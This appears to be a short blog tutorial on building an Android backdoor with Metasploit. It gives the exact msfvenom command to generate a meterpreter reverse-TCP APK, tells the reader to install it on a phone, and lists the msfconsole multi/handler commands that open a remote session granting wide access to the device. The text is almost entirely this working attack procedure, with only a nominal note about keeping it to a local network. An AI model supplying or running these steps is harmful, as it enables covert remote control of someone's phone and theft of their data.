Hacking android with metasploit



Creating a backdoor exploit for android is very easy using metasploit:
(I'll create here for connection on a lan/plan network so that you don't do mischiefs with others on the internet)
  1. First create the backdoor apk in your linux(Kali) terminal using: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/backdoor.apk
  2. Now you'll get an apk file named backdoor.apk in your home directory. Install it in your phone connected with the same network as you PC on your wlan(wifi).
  3. Now You can acess almost anything of your phone through the metasploit terminal in linux(Kali).
Open the metasploit terminal. msfconsole Now, set up a listener for that app. use exploit/multi/handler Now, set up a reverse payload: set payload android/meterpreter/reverse_tcp Set the L host: set LHOST 192.168.0.4 Now, connect with that installed app in your android phone exploit
Now, view a list of all possible actions/commands for the app using:
help
Join our telegram channel
Back to home page

Comments

Post a Comment